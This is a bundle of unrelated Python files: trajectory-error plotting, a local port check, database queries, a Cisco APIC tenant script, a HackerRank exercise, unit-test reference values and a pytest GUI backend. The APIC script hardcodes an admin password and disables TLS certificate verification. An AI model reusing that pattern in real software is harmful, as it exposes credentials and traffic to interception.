#cb = fig1.colorbar(sc2, ax=ax2)
cb.ax.yaxis.set_tick_params(labelsize=20)
fig1.savefig(self.path_to_save_data + self.version + "--rapport1_" + str(self.id), transparent=False)
fig2.savefig(self.path_to_save_data + self.version + "--rapport2_" + str(self.id), transparent=False)
plt.close(fig1)
plt.close(fig2)
def plot_MSE_prediction_1_target_id(self, target_id):
try:
data_ref = []
data_mes = []
for element in self.simulated_data_sort_by_target:
if target_id == int(element.target_id):
data_ref = element.data_list
for element in self.data_sort_by_target:
if target_id == int(element.target_id):
data_mes = element.data_list
(t_ref, x_ref, y_ref, t_mes, x_mes, y_mes) = get_comparable_data_btw_reference_mesure(data_ref, data_mes)
"""to put the prediction on the real data"""
x_ref = x_ref[1:]
y_ref = y_ref[1:]
t_ref = t_ref[1:]
x_mes = x_mes[:-1]
y_mes = y_mes[:-1]
t_mes = t_ref[:-1]
error_squared_x = error_squared_list(x_ref, x_mes)
error_squared_y = error_squared_list(y_ref, y_mes)
error_squared = error_squared_x_y_list(x_ref, y_ref, x_mes, y_mes)
self.plot_MES_target_id(target_id, t_ref, x_ref, y_ref, x_mes, y_mes, error_squared_x, error_squared_y,
error_squared)
except:
print("plot error : plot_MSE_prediction_1_target_id ")
def plot_MSE_prediction_2_target_id(self, target_id):
try:
data_ref = []
data_mes = []
for element in self.simulated_data_sort_by_target:
if target_id == int(element.target_id):
data_ref = element.data_list
for element in self.data_sort_by_target:
if target_id == int(element.target_id):
data_mes = element.data_list
(t_ref, x_ref, y_ref, t_mes, x_mes, y_mes) = get_comparable_data_btw_reference_mesure(data_ref, data_mes)
"""to put the prediction on the real data"""
x_ref = x_ref[2:]
y_ref = y_ref[2:]
t_ref = t_ref[2:]
x_mes = x_mes[:-2]
y_mes = y_mes[:-2]
t_mes = t_ref[:-2]
error_squared_x = error_squared_list(x_ref, x_mes)
error_squared_y = error_squared_list(y_ref, y_mes)
error_squared = error_squared_x_y_list(x_ref, y_ref, x_mes, y_mes)
self.plot_MES_target_id(target_id, t_ref, x_ref, y_ref, x_mes, y_mes, error_squared_x, error_squared_y,
error_squared)
except:
print("plot error: plot_MSE_prediction_2_target_id")
def plot_MSE_not_interpolate_target_id(self, target_id, remove_outliers=False):
data_ref = []
data_mes = []
for element in self.simulated_data_sort_by_target:
if target_id == int(element.target_id):
data_ref = element.data_list
for element in self.data_sort_by_target:
if target_id == int(element.target_id):
data_mes = element.data_list
try:
(t_ref, x_ref, y_ref, x_mes, y_mes, error_squared_x, error_squared_y,
error_squared) = error_squared_discrete(
data_ref, data_mes, remove_outliers)
self.plot_MES_target_id(target_id, t_ref, x_ref, y_ref, x_mes, y_mes, error_squared_x, error_squared_y,
error_squared)
except:
print("error plot : plot_MSE_not_interpolate_target_id")
import traceback
traceback.print_exc()
def plot_MSE_interpolate_target_id(self, target_id):
try:
data_ref = []
data_mes = []
for element in self.simulated_data_sort_by_target:
if target_id == int(element.target_id):
data_ref = element.data_list
for element in self.data_sort_by_target:
if target_id == int(element.target_id):
data_mes = element.data_list
(t_ref, x_ref, y_ref, x_mes, y_mes) = error_squared_with_interpolation(data_ref, data_mes)
fig = plt.figure(figsize=(12, 8))
fig.suptitle('Agent ' + str(self.id), fontsize=17, fontweight='bold', y=0.98)
fig.subplots_adjust(bottom=0.10, left=0.1, right=0.90, top=0.90)
ax1 = fig.add_subplot(1, 2, 1)
ax2 = fig.add_subplot(1, 2, 2)
plot_graph_x_y(ax1, data_ref[X_INDEX], data_ref[Y_INDEX], "Trajectory interpolation", "x [m]", "y [m]",
curve_label="interpolation_ref")
plot_graph_x_y(ax2, data_ref[X_INDEX], data_ref[Y_INDEX], "Trajectory interpolation", "x [m]", "y [m]",
curve_label="interpolation_ref")
plot_graph_x_y(ax2, data_mes[X_INDEX], data_mes[Y_INDEX], "Trajectory interpolation", "x [m]", "y [m]",
curve_label="interpolation_ref")
sc1 = ax1.scatter(np.array(x_ref), np.array(y_ref), c=np.array(t_ref),
s=2500 * math.pow(data_ref[RADIUS_INDEX][0], 2) * math.pi, vmin=T_MIN, vmax=T_MAX,
cmap="Spectral",
alpha=0.4)
sc2 = ax2.scatter(np.array(x_mes), np.array(y_mes), c=np.array(t_ref),
s=2500 * math.pow(data_ref[RADIUS_INDEX][0], 2) * math.pi, vmin=T_MIN, vmax=T_MAX,
cmap="Spectral",
alpha=0.4)
fig.colorbar(sc1, ax=ax1)
fig.colorbar(sc2, ax=ax2)
fig.savefig(self.path_to_save_data + self.version + "--Interpolation_agent_" + str(self.id),
transparent=False)
plt.close(fig)
except:
print("error plot : plot_MSE_interpolate_target_id")
def plot_MES_target_id(self, target_id, t_ref, x_ref, y_ref, x_mes, y_mes, error_squared_x, error_squared_y,
error_squared):
try:
fig = plt.figure(figsize=(12, 8), tight_layout=True)
ax = fig.add_subplot(3, 2, (1, 3))
ax1 = fig.add_subplot(3, 2, (5, 6))
ax2 = fig.add_subplot(3, 2, 2)
ax3 = fig.add_subplot(3, 2, 4)
mean_error_squared_x = np.mean(error_squared_x)
mean_error_squared_y = np.mean(error_squared_y)
mean_error_squared_x_y = np.mean(error_squared)
sc = ax.scatter(x_ref, y_ref, s=100, c=t_ref, cmap="Spectral", alpha=0.4)
plot_graph_time_x(ax, x_ref, y_ref, "Trajectory x-y plane (time [s] in color)", "x [m]", "y [m]",
curve_label="generated data (reference)")
plot_graph_x_y(ax, x_mes, y_mes, "Trajectory x-y plane (time [s] in color)", "x [m]", "y [m]",
curve_label="measured data")
plot_graph_time_x(ax1, t_ref, error_squared, "squared error norm x-y", "time [s]", "[m^2]",
curve_label="measured squared error")
plot_graph_time_x(ax2, t_ref, error_squared_x, "squared error norm x", "time [s]", "[m^2]",
curve_label="measured squared error")
plot_graph_time_x(ax3, t_ref, error_squared_y, "squared norm y", "time [s]", "[m^2]",
curve_label="measured squared error")
plot_graph_time_x(ax1, t_ref, mean_error_squared_x_y * np.ones(np.size(t_ref)),
"squared error norm x-y", "time [s]", "[m^2]", curve_label="mean squared error")
plot_graph_time_x(ax2, t_ref, mean_error_squared_x * np.ones(np.size(t_ref)), "squared error norm x",
"time [s]", "[m^2]",
curve_label="mean squared error")
plot_graph_time_x(ax3, t_ref, mean_error_squared_y * np.ones(np.size(t_ref)), "squared norm y", "time [s]",
"[m^2]", curve_label="mean squared error")
(yb, yh) = ax1.get_ylim()
ax1.text(0, yh, "mean error = %.2f m" % (np.sqrt(mean_error_squared_x_y)), fontweight='bold', fontsize=10)
(yb, yh) = ax2.get_ylim()
ax2.text(0, yb, "mean error = %.2f m" % (np.sqrt(mean_error_squared_x)), fontweight='bold', fontsize=10)
(yb, yh) = ax3.get_ylim()
ax3.text(0, yb, "mean error = %.2f m" % (np.sqrt(mean_error_squared_y)), fontweight='bold', fontsize=10)
fig.colorbar(sc, ax=ax)
fig.savefig(
self.path_to_save_data + self.version + "--MSE_agent_" + str(self.id) + "-target_" + str(target_id),
transparent=False)
plt.close(fig)
except:
print("error plot : plot_MES_target_id")
def plot_position_target_simulated_data_collected_data(self):
try:
if self.id == "":
title = 'Ideal solution ' + str(self.id)
elif int(self.id) < 100:
title = 'Agent Camera ' + str(self.id)
else:
title = 'Agent User ' + str(self.id)
fig_position = plt.figure(figsize=(12, 8))
fig_position.suptitle(title, fontsize=17, fontweight='bold', y=0.98)
fig_position.subplots_adjust(bottom=0.10, left=0.1, right=0.90, top=0.90)
ax1 = fig_position.add_subplot(1, 2, 1)
ax2 = fig_position.add_subplot(1, 2, 2)
for element in self.simulated_data_sort_by_target:
sc1 = plot_target_memory_time_x_y_2D(ax1, element.data_list,
curve_label="target" + str(element.target_id) + " - ref")
for element in self.data_sort_by_target:
sc2 = plot_target_memory_time_x_y_2D(ax2, element.data_list,
curve_label="target" + str(element.target_id) + " - mes")
fig_position.colorbar(sc1, ax=ax1)
fig_position.colorbar(sc2, ax=ax2)
fig_position.savefig(self.path_to_save_data + self.version + "--position_agent_" + str(self.id),
transparent=False)
plt.close(fig_position)
except:
print("error plot : plot_position_target_simulated_data_collected_data")
def plot_generated_local_filter(self):
try:
if self.id == "":
title = 'Ideal solution ' + str(self.id)
elif int(self.id) < 100:
title = 'Agent Camera ' + str(self.id)
else:
title = 'Agent User ' + str(self.id)
fig_position = plt.figure(figsize=(12, 8))
fig_position.suptitle(title, fontsize=17, fontweight='bold', y=0.98)
fig_position.subplots_adjust(bottom=0.10, left=0.1, right=0.90, top=0.90)
ax1 = fig_position.add_subplot(1, 2, 1)
ax2 = fig_position.add_subplot(1, 2, 2)
for element in self.simulated_data_sort_by_target:
sc1 = plot_target_memory_time_x_y_2D(ax1, element.data_list,
curve_label="target" + str(element.target_id) + " - ref")
for element in self.data_sort_by_target:
sc2 = plot_target_memory_time_x_y_2D(ax2, element.data_list,
curve_label="target" + str(element.target_id) + " - mes")
fig_position.colorbar(sc1, ax=ax1)
fig_position.colorbar(sc2, ax=ax2)
fig_position.savefig(self.path_to_save_data + self.version + "--position_agent_" + str(self.id),
transparent=False)
plt.close(fig_position)
except:
print("error plot : plot_position_target_simulated_data_collected_data")
def plot_all_target_simulated_data_collected_data(self):
fig_time_type_x_y = plt.figure(figsize=(12, 8), tight_layout=True)
if self.id == "":
title = 'Ideal solution ' + str(self.id)
elif int(self.id) < 100:
title = 'Agent Camera ' + str(self.id)
else:
title = 'Agent User ' + str(self.id)
fig_time_type_x_y.suptitle(title, fontsize=17, fontweight='bold', y=1)
ax1 = fig_time_type_x_y.add_subplot(2, 2, 1)
ax2 = fig_time_type_x_y.add_subplot(2, 2, 2)
ax3 = fig_time_type_x_y.add_subplot(2, 2, 3)
ax4 = fig_time_type_x_y.add_subplot(2, 2, 4)
try:
for element in self.simulated_data_sort_by_target:
sc1 = plot_target_memory_time_x_y_2D(ax1, element.data_list,
curve_label="target" + str(element.target_id) + " - ref")
for element in self.data_sort_by_target:
plot_target_memory_x_y(ax1, element.data_list, curve_label="target" + str(element.target_id) + " - mes")
sc2 = plot_target_memory_type_x_y_2D(ax2, element.data_list,
curve_label="target" + str(element.target_id) + " - mes")
sc3 = plot_target_memory_agent_x_y_2D(ax3, element.data_list,
curve_label="target" + str(element.target_id) + " - mes")
plot_target_memory_time_agent(ax4, element.data_list,
curve_label="target" + str(element.target_id) + " - mes")
fig_time_type_x_y.colorbar(sc1, ax=ax1)
fig_time_type_x_y.colorbar(sc2, ax=ax2)
fig_time_type_x_y.colorbar(sc3, ax=ax3)
fig_time_type_x_y.savefig(self.path_to_save_data + self.version + "--general_agent_" + str(self.id),
transparent=False)
plt.close(fig_time_type_x_y)
except:
print("error plot: plot_all_target_simulated_data_collected_data")
def plot_a_target_simulated_data_collected_data(self, target_id):
fig_time_type_x_y = plt.figure(figsize=(12, 8), tight_layout=True)
if self.id == "":
title = 'Ideal solution ' + str(self.id)
elif int(self.id) < 100:
title = 'Agent Camera ' + str(self.id)
else:
title = 'Agent User ' + str(self.id)
fig_time_type_x_y.suptitle(title, fontsize=17, fontweight='bold', y=1)
ax1 = fig_time_type_x_y.add_subplot(2, 2, 1)
ax2 = fig_time_type_x_y.add_subplot(2, 2, 2)
ax3 = fig_time_type_x_y.add_subplot(2, 2, 3)
ax4 = fig_time_type_x_y.add_subplot(2, 2, 4)
try:
for element in self.simulated_data_sort_by_target:
if target_id == int(element.target_id):
sc1 = plot_target_memory_time_x_y_2D(ax1, element.data_list,
curve_label="target " + str(element.target_id) + " - ref")
for element in self.data_sort_by_target:
if target_id == int(element.target_id):
plot_target_memory_x_y(ax1, element.data_list,
curve_label="target " + str(element.target_id) + " - mes")
sc2 = plot_target_memory_type_x_y_2D(ax2, element.data_list,
curve_label="target" + str(element.target_id) + " - mes")
sc3 = plot_target_memory_agent_x_y_2D(ax3, element.data_list,
curve_label="target" + str(element.target_id) + " - mes")
plot_target_memory_time_agent(ax4, element.data_list,
curve_label="target" + str(element.target_id) + " - mes")
fig_time_type_x_y.colorbar(sc1, ax=ax1)
fig_time_type_x_y.colorbar(sc2, ax=ax2)
fig_time_type_x_y.colorbar(sc3, ax=ax3)
fig_time_type_x_y.savefig(self.path_to_save_data + self.version + "--general_agent_" + str(
self.id) + "-target_" + str(target_id), transparent=False)
except:
print("plot_a_target_simulated_data_collected_data")
plt.close(fig_time_type_x_y)
class Analyser_Agent_Target_TargetEstimator_FormatCSV:
def __init__(self, agent_id, path_to_load_data, path_to_save_data, version="version"):
self.id = agent_id
self.version = version
self.path_to_save_data = path_to_save_data
self.data = load_csv_file_dictionnary(path_to_load_data + str(agent_id))
self.simulated_data = load_csv_file_dictionnary(constants.ResultsPath.SAVE_LOAD_DATA_REFERENCE)
self.data_sort_by_agent_target = []
self.simulated_data_sort_by_target = []
init_analyse_memory_all_agent(self.data, self.data_sort_by_agent_target)
init_analyse_memory_agent(self.simulated_data, self.simulated_data_sort_by_target)
def plot_position_target_simulated_data_collected_data(self):
try:
if self.id == "":
title = 'Ideal solution ' + str(self.id)
elif int(self.id) < 100:
title = 'Agent Camera ' + str(self.id)
else:
title = 'Agent User ' + str(self.id)
fig_position = plt.figure(figsize=(12, 8))
fig_position.suptitle(title, fontsize=17, fontweight='bold', y=0.98)
fig_position.subplots_adjust(bottom=0.10, left=0.1, right=0.90, top=0.90)
ax1 = fig_position.add_subplot(1, 2, 1)
ax2 = fig_position.add_subplot(1, 2, 2)
for element in self.simulated_data_sort_by_target:
sc1 = plot_target_memory_time_x_y_2D(ax1, element.data_list,
curve_label="target" + str(element.target_id) + " - ref")
for element_agent in self.data_sort_by_agent_target:
for element_target in element_agent.data_list:
sc2 = plot_target_memory_time_x_y_2D(ax2, element_target.data_list,
curve_label="agent" + str(
element_agent.agent_id) + "-target" + str(
element_target.target_id) + " - mes")
fig_position.colorbar(sc1, ax=ax1)
fig_position.colorbar(sc2, ax=ax2)
fig_position.savefig(
constants.ResultsPath.SAVE_LOAD_PLOT_MEMORY_ALL_AGENT + self.version + "--position_all_agent_" + str(
self.id),
transparent=False)
plt.close(fig_position)
except:
print("plot_position_target_simulated_data_collected_data")
def plot_all_target_simulated_data_collected_data(self):
try:
if self.id == "":
title = 'Ideal solution ' + str(self.id)
elif int(self.id) < 100:
title = 'Agent Camera ' + str(self.id)
else:
title = 'Agent User ' + str(self.id)
fig_time_type_x_y = plt.figure(figsize=(12, 8), tight_layout=True)
fig_time_type_x_y.suptitle(title, fontsize=17, fontweight='bold', y=1)
ax1 = fig_time_type_x_y.add_subplot(2, 2, 1)
ax2 = fig_time_type_x_y.add_subplot(2, 2, 2)
ax3 = fig_time_type_x_y.add_subplot(2, 2, 3)
ax4 = fig_time_type_x_y.add_subplot(2, 2, 4)
for element in self.simulated_data_sort_by_target:
sc1 = plot_target_memory_time_x_y_2D(ax1, element.data_list,
curve_label="target" + str(element.target_id) + " -ref")
for element_agent in self.data_sort_by_agent_target:
for element_target in element_agent.data_list:
plot_target_memory_x_y(ax1, element_target.data_list,
curve_label="agent-" + str(element_agent.agent_id)
+ ",target-" + str(
element_target.target_id))
sc2 = plot_target_memory_type_x_y_2D(ax2, element_target.data_list,
curve_label="agent-" + str(element_agent.agent_id)
+ ",target-" + str(
element_target.target_id) + " - mes")
sc3 = plot_target_memory_agent_x_y_2D(ax3, element_target.data_list,
curve_label="agent-" + str(element_agent.agent_id)
+ ",target-" + str(
element_target.target_id) + " - mes")
plot_target_memory_time_agent(ax4, element_target.data_list,
curve_label="agent-" + str(element_agent.agent_id)
+ ",target-" + str(element_target.target_id) + " - mes")
fig_time_type_x_y.colorbar(sc1, ax=ax1)
fig_time_type_x_y.colorbar(sc2, ax=ax2)
fig_time_type_x_y.colorbar(sc3, ax=ax3)
fig_time_type_x_y.savefig(
constants.ResultsPath.SAVE_LOAD_PLOT_MEMORY_ALL_AGENT + self.version + "--general_agent_" + str(
self.id),
transparent=False)
plt.close(fig_time_type_x_y)
except:
print("plot_all_target_simulated_data_collected_data")
if __name__ == '__main__':
constants.ResultsPath.folder = "../../results"
constants.ResultsPath.name_simulation = "attractiv_combine"
analyser_simulated_data = Analyser_Target_TargetEstimator_FormatCSV("",
constants.ResultsPath.SAVE_LOAD_DATA_REFERENCE,
constants.ResultsPath.SAVE_LAOD_PLOT_FOLDER)
analyser_simulated_data.plot_all_target_simulated_data_collected_data()
|
import socket
def check_port(port: int):
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(3)
s.connect(("127.0.0.1", port))
s.shutdown(2)
|
from model.ModelSqlite import db, Task, Action, Order, TaskType
from sqlalchemy import and_, func
def save(task):
db.session.add(task)
db.session.commit()
return task
def load_by_date(sumary_date):
query = db.session.query(Task, Action, TaskType, Order) \
.join(Action, Action.task_id == Task.id) \
.join(TaskType, TaskType.id == Task.type_id) \
.outerjoin(Order, Order.id == Task.order_id) \
.filter(Action.init >= sumary_date)\
.group_by(Task.id)
return query.all()
def load_by_search(search):
filters = [Order.number == search] if search.isnumeric() else [TaskType.name == search]
query = db.session.query(Task, Action, TaskType, Order) \
.join(Action, Action.task_id == Task.id) \
.join(TaskType, TaskType.id == Task.type_id) \
.outerjoin(Order, Order.id == Task.order_id) \
.filter(and_(*filters)).group_by(Task.id)\
.group_by(Task.id)
return query.all()
def load_by_id(id: int):
return Task.query.filter(Task.id == id).first()
def set_order(order):
db.session.query(Task).filter(Task.id == order.task_id).update({"order_id": order.id})
db.session.commit()
|
import requests
import json
""" get Token """
def get_token(APIC):
url = f"https://{APIC}/api/aaaLogin.json"
""" sandbox aa credentials """
payload = {
"aaaUser": {
"attributes": {
"name":"admin",
"pwd":"C1sco12345"
}
}
}
headers = {
"Content-Type" : "application/json"
}
requests.packages.urllib3.disable_warnings()
response = requests.post(url,data=json.dumps(payload), headers=headers, verify=False).json()
token = response['imdata'][0]['aaaLogin']['attributes']['token']
return token
def my_post(URL,payload,token = None):
url = URL
data = payload
if (token == None):
headers = {'Content-type': 'application/json', 'Accept': 'application/json'}
else:
headers = {'Content-type': 'application/json', 'Accept': 'application/json', "Cookie" : f"APIC-Cookie={token}"}
requests.packages.urllib3.disable_warnings()
return requests.post(url, data=json.dumps(data), headers=headers, verify=False)
def my_get(URL,token = None):
url = URL
if (token == None):
headers = {'Content-type': 'application/json', 'Accept': 'application/json'}
else:
headers = {'Content-type': 'application/json', 'Accept': 'application/json', "Cookie" : f"APIC-Cookie={token}"}
requests.packages.urllib3.disable_warnings()
return requests.get(url, headers=headers, verify=False)
def printj(json_object):
if type(json_object) is list:
json_formatted_str = json.dumps(json_object[0], indent=4, sort_keys=True)
elif type(json_object) is dict:
json_formatted_str = json.dumps(json_object, indent=4 , sort_keys=True)
elif type(json_object) is str:
json_formatted_str = json.dumps(json_object , indent=4, sort_keys=True)
elif type(json_object) is bytes:
json_encoded = json_object.decode("utf-8")
json_formatted_str = json.dumps(json_encoded, indent=4, sort_keys=True)
else:
json_formatted_str = "Dont know how to print: "+str(type(json_object))
print(json.loads(json_formatted_str))
def main():
APIC = "10.10.20.14"
token = get_token(APIC)
print("The token is: " + token)
"""create tenant"""
NAME = "test-Leu"
DN = f"tn-{NAME}"
URL = f"https://{APIC}/api/node/mo/uni/{DN}.json"
payload = {"fvTenant":{"attributes":{"dn":f"uni/{DN}","name":NAME,"nameAlias":NAME,"rn":DN,"status":"created"},"children":[]}}
response=my_post(URL,payload,token)
print("\nResponse code ["+str(response.status_code)+"] Create tenant : \n")
data = response.content
printj(data)
""" list all Tenants """
url = f"https://{APIC}/api/node/class/fvTenant.json"
payload={}
response=my_get(URL,token)
print("\nResponse code ["+str(response.status_code)+"] tenant list: \n")
printj(response.content)
if __name__ == "__main__":
main() |
# Python > Sets > Symmetric Difference
# Learn about sets as a data type.
#
# https://www.hackerrank.com/challenges/symmetric-difference/problem
#
m = int(input())
M = set(map(int, input().split()))
n = int(input())
N = set(map(int, input().split()))
a = (M - N).union(N - M)
for i in sorted(a):
print(i)
|
from mpmath import mpf, mp, mpc
from UnitTesting.standard_constants import precision
mp.dps = precision
trusted_values_dict = {}
# Generated on: 2019-11-26
trusted_values_dict['GRMHD__generate_everything_for_UnitTesting__globals'] = {'GRHDT4UU[0][0]': mpf('-2.3394549490075809540461930203703'), 'GRHDT4UU[0][1]': mpf('2.67395385292607006300096827671314'), 'GRHDT4UU[0][2]': mpf('0.939965144645438226830568588005522'), 'GRHDT4UU[0][3]': mpf('2.76759751772851491817709721309047'), 'GRHDT4UU[1][0]': mpf('2.67395385292607006300096827671314'), 'GRHDT4UU[1][1]': mpf('1.3371421668550838437046466896128'), 'GRHDT4UU[1][2]': mpf('-1.05274338618835252181323562334257'), 'GRHDT4UU[1][3]': mpf('-0.11457605315808485745489330153845'), 'GRHDT4UU[2][0]': mpf('0.939965144645438226830568588005522'), 'GRHDT4UU[2][1]': mpf('-1.05274338618835252181323562334257'), 'GRHDT4UU[2][2]': mpf('-1.73967973788547621712965727684159'), 'GRHDT4UU[2][3]': mpf('1.31193965191419717041027546492757'), 'GRHDT4UU[3][0]': mpf('2.76759751772851491817709721309047'), 'GRHDT4UU[3][1]': mpf('-0.11457605315808485745489330153845'), 'GRHDT4UU[3][2]': mpf('1.31193965191419717041027546492757'), 'GRHDT4UU[3][3]': mpf('-0.604443288062090381548088559383374'), 'GRFFET4UU[0][0]': mpf('5991.56954097030513738270514757149'), 'GRFFET4UU[0][1]': mpf('-6598.52015499156408677448047649955'), 'GRFFET4UU[0][2]': mpf('-2343.18579534750494129000780465075'), 'GRFFET4UU[0][3]': mpf('-6968.06092890997670993374272963683'), 'GRFFET4UU[1][0]': mpf('-6598.52015499156408677448047649955'), 'GRFFET4UU[1][1]': mpf('-2466.3090636462143709789502824391'), 'GRFFET4UU[1][2]': mpf('2908.65775887537152658374734421312'), 'GRFFET4UU[1][3]': mpf('808.033384967900271741702359802519'), 'GRFFET4UU[2][0]': mpf('-2343.18579534750494129000780465075'), 'GRFFET4UU[2][1]': mpf('2908.65775887537152658374734421312'), 'GRFFET4UU[2][2]': mpf('4487.54461021648368811305964573659'), 'GRFFET4UU[2][3]': mpf('-3218.73486933020079468156482621409'), 'GRFFET4UU[3][0]': mpf('-6968.06092890997670993374272963683'), 'GRFFET4UU[3][1]': mpf('808.033384967900271741702359802519'), 'GRFFET4UU[3][2]': mpf('-3218.73486933020079468156482621409'), 'GRFFET4UU[3][3]': mpf('1766.31736072850622241146184994002'), 'T4UU[0][0]': mpf('5989.23008602129755642865895455095'), 'T4UU[0][1]': mpf('-6595.84620113863801671147950822353'), 'T4UU[0][2]': mpf('-2342.24583020285950306317723606236'), 'T4UU[0][3]': mpf('-6965.293331392248195015565632424'), 'T4UU[1][0]': mpf('-6595.84620113863801671147950822353'), 'T4UU[1][1]': mpf('-2464.97192147935928713524563574923'), 'T4UU[1][2]': mpf('2907.60501548918317406193410858997'), 'T4UU[1][3]': mpf('807.918808914742186884247466500894'), 'T4UU[2][0]': mpf('-2342.24583020285950306317723606236'), 'T4UU[2][1]': mpf('2907.60501548918317406193410858997'), 'T4UU[2][2]': mpf('4485.80493047859821189592998845987'), 'T4UU[2][3]': mpf('-3217.42292967828659751115455074876'), 'T4UU[3][0]': mpf('-6965.293331392248195015565632424'), 'T4UU[3][1]': mpf('807.918808914742186884247466500894'), 'T4UU[3][2]': mpf('-3217.42292967828659751115455074876'), 'T4UU[3][3]': mpf('1765.71291744044413202991376138024'), 'T4UD[0][0]': mpf('-6870.50023105853469095799608311124'), 'T4UD[0][1]': mpf('-2324.03676683773283401262026874044'), 'T4UD[0][2]': mpf('-1841.79584721496995247167903618172'), 'T4UD[0][3]': mpf('-3343.37979075962099673446089303178'), 'T4UD[1][0]': mpf('-8534.95747250755649982597017952808'), 'T4UD[1][1]': mpf('-6501.89969848888732111993178265964'), 'T4UD[1][2]': mpf('-3449.35227632433778077394214094721'), 'T4UD[1][3]': mpf('-6193.86931383808158341657221278966'), 'T4UD[2][0]': mpf('-1990.18153461046463468207070624917'), 'T4UD[2][1]': mpf('-992.505392772397307812120386705513'), 'T4UD[2][2]': mpf('-3048.94486605175226958188078316937'), 'T4UD[2][3]': mpf('-1444.59289633008084150679689134761'), 'T4UD[3][0]': mpf('-9225.51016918139086571548509646491'), 'T4UD[3][1]': mpf('-4629.61358070384390723225768218619'), 'T4UD[3][2]': mpf('-3680.82198440288796241369433789975'), 'T4UD[3][3]': mpf('-8915.04416948626751110253138484779'), 'rho_star': mpc(real='0.0', imag='0.0725005943667336311131421666686947'), 'tau_tilde': mpc(real='0.0', imag='988.112144669082681502914056181908'), 'S_tildeD[0]': mpc(real='0.0', imag='-667.479312467258523611235432326794'), 'S_tildeD[1]': mpc(real='0.0', imag='-528.976410074985551545978523790836'), 'S_tildeD[2]': mpc(real='0.0', imag='-960.241626077929595339810475707054'), 'rho_star_fluxU[0]': mpc(real='0.0', imag='0.151157523416274364169709087946103'), 'rho_star_fluxU[1]': mpc(real='0.0', imag='0.0354521203700244244561012862959615'), 'rho_star_fluxU[2]': mpc(real='0.0', imag='0.147324180562029810603874580010597'), 'tau_tilde_fluxU[0]': mpc(real='0.0', imag='-1088.42358066793553916795644909143'), 'tau_tilde_fluxU[1]': mpc(real='0.0', imag='-386.491028479166800480015808716416'), 'tau_tilde_fluxU[2]': mpc(real='0.0', imag='-1149.37616010430565438582561910152'), 'S_tilde_fluxUD[0][0]': mpc(real='0.0', imag='-1867.39022480424227978801354765892'), 'S_tilde_fluxUD[0][1]': mpc(real='0.0', imag='-990.677651365700967289740219712257'), 'S_tilde_fluxUD[0][2]': mpc(real='0.0', imag='-1778.92178390022604617115575820208'), 'S_tilde_fluxUD[1][0]': mpc(real='0.0', imag='-285.054361721301120269345119595528'), 'S_tilde_fluxUD[1][1]': mpc(real='0.0', imag='-875.67789459369396354304626584053'), 'S_tilde_fluxUD[1][2]': mpc(real='0.0', imag='-414.896996035696645321877440437675'), 'S_tilde_fluxUD[2][0]': mpc(real='0.0', imag='-1329.65679972525344965106341987848'), 'S_tilde_fluxUD[2][1]': mpc(real='0.0', imag='-1057.15734041790733499510679394007'), 'S_tilde_fluxUD[2][2]': mpc(real='0.0', imag='-2560.46188157375854643760249018669'), 's_source_term': mpc(real='0.0', imag='-3583.54113198716822807909920811653'), 'S_tilde_source_termD[0]': mpc(real='0.0', imag='-4685.8317475127487341524101793766'), 'S_tilde_source_termD[1]': mpc(real='0.0', imag='-3566.11756884097394504351541399956'), 'S_tilde_source_termD[2]': mpc(real='0.0', imag='-3919.1987609787192923249676823616')}
|
import json
import logging
import os
import subprocess
import sys
from multiprocessing.connection import Listener
from queue import Queue
from threading import Thread
from decouple import config
logger = logging.getLogger('pytest_gui.backend.main')
TEST_DIR = config("PYTEST_GUI_TEST_DIR", default=".")
if len(sys.argv) == 2:
if os.path.isdir(sys.argv[1]):
TEST_DIR = sys.argv[1]
else:
raise ValueError(f"{sys.argv[1]} is not a valid directory")
PLUGIN_PORT = config("PYTEST_GUI_PLUGIN_PORT", cast=int, default=6000)
PLUGIN_PATH = "pytest_gui.pytest.pytest_gui_plugin"
ADDRESS = ('localhost', PLUGIN_PORT)
_builtin_markers = [
"no_cover",
"filterwarnings",
"skip",
"skipif",
"xfail",
"parametrize",
"usefixtures",
"tryfirst",
"trylast",
]
def _filter_only_custom_markers(out):
"""Generator for parse output and return custom markers
Args:
out (str): output of pytest --markers
Yields:
tuple(str, str): contains name and description of the marker
"""
for marker in out:
if marker.startswith("@"):
name = marker.split(":")[0].split(".")[2]
desc = "".join(marker.split(":")[1:]).strip().rstrip(".")
if any(name.startswith(marker) for marker in _builtin_markers):
continue
yield name, desc
class _TestRunner(Thread):
def __init__(self, worker, *args, **kwargs):
super().__init__(*args, **kwargs)
self.worker = worker
def run(self):
try:
while self.worker._cur_tests.poll() is None:
output = self.worker._cur_tests.stdout.readline()
if output != b'':
self.worker.log_queue.put(output.strip())
self.worker._cur_tests.wait()
self.worker._remove_proccess(self.worker._cur_tests.pid)
self.worker._cur_tests = None
self.worker.tests_running = False
self.worker.test_stream_connection = None
except Exception:
if self.worker._cur_tests is not None: # Exception raised not via kill
raise
class _StatusUpdate(Thread):
def __init__(self, worker, *args, **kwargs):
super().__init__(*args, **kwargs)
self.worker = worker
@staticmethod
def _generate_status(conn):
while True:
try:
msg = conn.recv()
except (EOFError, AttributeError):
break
yield msg
def run(self):
for msg in self._generate_status(self.worker.test_stream_connection):
self.worker.status_queue.put(msg)
class PytestWorker:
def __init__(self, test_dir):
self.test_dir = test_dir
self.markers = None
self.tests_running = False
self.test_stream_connection = None
self._cur_tests = None
self._listener = Listener(ADDRESS)
self.log_queue = Queue()
self.status_queue = Queue()
self._process = {}
def __del__(self):
self._listener.close()
def discover(self):
p, conn = self._run_pytest(self.test_dir, "--collect-only")
logger.debug(f'Connection accepted from {self._listener.last_accepted}')
try:
tests = json.loads(conn.recv()) # Only one message
finally:
conn.close()
p.wait()
self._remove_proccess(p.pid)
if p.returncode != 0:
logger.error(f"Failed to collect tests:\nstdout:\n{p.stdout.read()}\nstderr\n{p.stderr.read()}")
return None
logger.info(f"Collected {len(tests)} tests")
return tests
def get_markers(self):
p, _ = self._run_pytest(self.test_dir, "--markers")
p.wait()
self._remove_proccess(p.pid)
if p.returncode != 0:
logger.error(f"Failed to get markers:\nstdout:\n{p.stdout.read()}\nstderr\n{p.stderr.read()}")
return None
self.markers = [{"name": name} for name, desc in _filter_only_custom_markers(p.stdout)]
logger.info(f"Got {len(self.markers)} custom markers")
return self.markers
def run_tests(self, tests):
if tests is None:
raise RuntimeError("No tests available")
self.tests_running = True
pytest_arg = [test["nodeid"] for test in tests]
p, conn = self._run_pytest(*pytest_arg)
self._cur_tests = p
self.test_stream_connection = conn
_TestRunner(self).start()
_StatusUpdate(self).start()
def stop_tests(self):
if self._cur_tests is None:
raise RuntimeError("No currently running tests")
